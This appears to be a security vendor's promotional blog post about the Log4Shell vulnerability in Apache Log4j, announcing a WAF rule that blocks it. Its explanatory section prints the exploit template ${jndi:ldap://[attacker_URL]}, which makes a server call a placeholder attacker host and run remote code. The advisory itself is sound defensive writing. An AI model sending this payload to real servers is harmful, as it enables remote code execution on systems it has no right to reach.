Log4j Log4Shell Zero-day Vulnerability is Patched by BitNinja

On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called "Log4Shell". It has been exposed for the Apache Log4j Java-based logging platform used to access the web server and application logs.

About the vulnerability

To exploit this vulnerability, an attacker could modify the user agent of a web browser to access the website or search the website for a string using the format ${jndi:ldap://[attacker_URL]}. This will add the string to the web server's access log. 

If the Log4j application parses these logs and finds a string, the error forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass a Base64-encoded commands or Java classes to execute on a vulnerable device.

Solution by BitNinja

The threat management team of BitNinja found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don't have to do anything. Just sit back and relax. We are taking care of the safety of your servers.

Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!

If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card is needed!

Let’s make the Internet a safer place together!

If you have no more queries, 
take the next step and sign up!
Don’t worry, the installation process is quick and straightforward!
AICPA SOC BitNinja Server Security
Privacy Shield BitNinja Server Security
GDPR BitNinja Server Security
CCPA BitNinja Server Security
2024 BitNinja. All Rights reserved.
Hexa BitNinja Server SecurityHexa BitNinja Server Security